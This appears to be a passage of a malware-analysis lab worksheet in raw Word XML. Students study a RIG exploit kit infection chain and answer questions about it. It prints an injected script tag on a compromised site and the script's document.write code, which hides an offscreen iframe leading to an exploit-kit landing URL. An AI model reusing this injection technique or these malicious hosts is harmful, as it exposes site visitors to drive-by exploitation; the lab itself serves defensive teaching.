        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;link rel="alternate" type="application/rss+xml" href="//www.homeimprovement.com/?feed=comments-rss2" title="Home Improvement latest comments" /&gt;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;link rel="pingback" href="//www.homeimprovement.com/xmlrpc.php" /&gt;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;link rel="shortcut icon" href="//www.homeimprovement.com/wp-content/themes/arras/images/favicon.ico" /&gt;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;script type="text/javascript" src="//retrotip.visionurbana.com.ve/engine/classes/js/dle_js.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;!-- All in One SEO Pack 2.3.2.3 by Michael Torbert of Semper Fi Web Design[291,330] --&gt;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;meta name="description"  content="Installing cabinets in a remodeled kitchen require some basic finish carpentry skills. Before starting any installation, it's a good idea to mark some level and" /&gt;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;meta name="keywords"  content="cabinets,kitchen,kitchen cabints,knobs,remodel" /&gt;</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;some output omitted&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">dle_js.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">file in choice of text editor and examine it. </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1176"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">docu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ment.write('&lt;div class="" style="position:absolute; width:383px; height:368px; left:17px; top:-858px;"&gt;  &lt;div  style="" class=""&gt;&lt;a&gt;head&lt;/a&gt;&lt;a class="head-menu-2"&gt; &lt;/a&gt;&lt;iframe src="http://tyu.benme.com/?q=zn_QMvXcJwDQDofGMvrESLtEMUbQA0KK2OH_76iyEoH9JHT1vrT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">USkrttgWC&amp;biw=Amaya.81lp85.406f4y5l9&amp;oq=elTX_fUlL7ABPAuy2EyALQZnlY0IU1IQ8fj630PWwUWZ0pDRqx29UToBvdeW&amp;yus=Amaya.110oz60.406a7e5q8&amp;br_fl=4109&amp;tuif=5364&amp;ct=Amaya" width=290 height=257 &gt;&lt;/ifr' +'ame&gt; &lt;a style=""&gt;&lt;/a&gt;&lt;/div&gt;&lt;a class="" style=""&gt;temp&lt;/a&gt;&lt;/div&gt;');</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1103"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Question:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">What does the file do?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing w:after="240" w:before="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">How does the code in the javascript file attempt to avoid detection? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1167"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In a text editor, open the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">text/html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file that was saved to your home folder with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Vivaldi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as part of the filename.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Examine the file and answer the following questions:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1103"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questions:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">What kind of file it is?</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are some interesting things about the iframe? Does it call anything?</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does the start() function do?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1169"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">What do you think the purpose of the getBrowser() function is?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1155"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1100"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reflection</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1170"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploit Kits are fairly complex exploits that use a variety of methods and resources to carry out an attack. Interestingly EKs may be used to deliver diverse malware payloads. This is because the EK developer may offe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">r the exploit kit as a service to other threat actors. Therefore, RIG EK has been associated with a number of different malware payloads. The following questions may require you investigate the data further using the tools that were introduced in this lab.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1182"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The EK used a number of websites. Complete the table below.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="1223"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblW w:w="9787" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="115" w:type="dxa"/>
          <w:top w:w="14" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
          <w:bottom w:w="14" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblBorders/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3129"/>
        <w:gridCol w:w="3093"/>
        <w:gridCol w:w="3565"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="dbe5f1"/>
            <w:tcBorders/>
            <w:tcW w:w="3129" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1162"/>
              <w:widowControl w:val="false"/>
              <w:pBdr/>
              <w:spacing w:after="120" w:before="120"/>
              <w:ind/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">URL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="dbe5f1"/>
            <w:tcBorders/>
            <w:tcW w:w="3093" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1162"/>
              <w:widowControl w:val="false"/>
              <w:pBdr/>
              <w:spacing w:after="120" w:before="120"/>
              <w:ind/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">IP Address</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="dbe5f1"/>
            <w:tcBorders/>
            <w:tcW w:w="3565" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1162"/>
              <w:widowControl w:val="false"/>
              <w:pBdr/>
              <w:spacing w:after="120" w:before="120"/>
              <w:ind/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">Function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcW w:w="3129" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1160"/>
              <w:widowControl w:val="false"/>
              <w:pBdr/>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">www.bing.com</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcW w:w="3093" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1160"/>
              <w:widowControl w:val="false"/>
              <w:pBdr/>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcW w:w="3565" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1160"/>
              <w:widowControl w:val="false"/>
              <w:pBdr/>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">search engine links to legitimate webpage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcW w:w="3129" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1166"/>
              <w:widowControl w:val="false"/>
              <w:pBdr/>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">blank</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcW w:w="3093"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565"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r>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcW w:w="3129"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093"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565"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r>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcW w:w="3129"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093"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565"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r>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcW w:w="3129"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093"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565"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r>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcW w:w="3129"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093"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c>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcW w:w="3565" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="1166"/>
              <w:widowControl w:val="false"/>
              <w:pBdr/>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="1118"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">blank</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="1118"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="1118"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1182"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It is useful to “tell the story” of an exploit to understand what happened and how it works. Start with the user searching the internet with Bing. Search the web for more information on the RIG EK to help.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1153"/>
        <w:pBdr/>
        <w:spacing w:after="480" w:before="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type your answers here.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1166"/>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">End of document</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId10"/>
      <w:headerReference w:type="first" r:id="rId11"/>
      <w:footerReference w:type="default" r:id="rId12"/>
      <w:footerReference w:type="first" r:id="rId13"/>
      <w:footnotePr/>
      <w:endnotePr/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:h="15840" w:orient="portrait" w:w="12240"/>
      <w:pgMar w:top="1526" w:right="1080" w:bottom="1152" w:left="1080" w:header="720" w:footer="72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Liberation Sans">
    <w:panose1 w:val="020B0604020202020204"/>
  </w:font>
  <w:font w:name="FreeSans">
    <w:panose1 w:val="020B0504020202020204"/>
  </w:font>
  <w:font w:name="宋体">
    <w:panose1 w:val="02000506000000020000"/>
  </w:font>
  <w:font w:name="Courier New">
    <w:panose1 w:val="02070309020205020404"/>
  </w:font>
  <w:font w:name="Noto Sans CJK SC">
    <w:panose1 w:val="020B0500000000000000"/>
  </w:font>
  <w:font w:name="Tahoma">
    <w:panose1 w:val="020B06040305040402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8"/>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="60"/>
      <w:ind/>
      <w:rPr>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:pP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 xml:space="preserve">14</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 xml:space="preserve">14</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:r>
    <w:r>
      <w:rPr>
        <w:szCs w:val="1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8"/>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="60"/>
      <w:ind/>
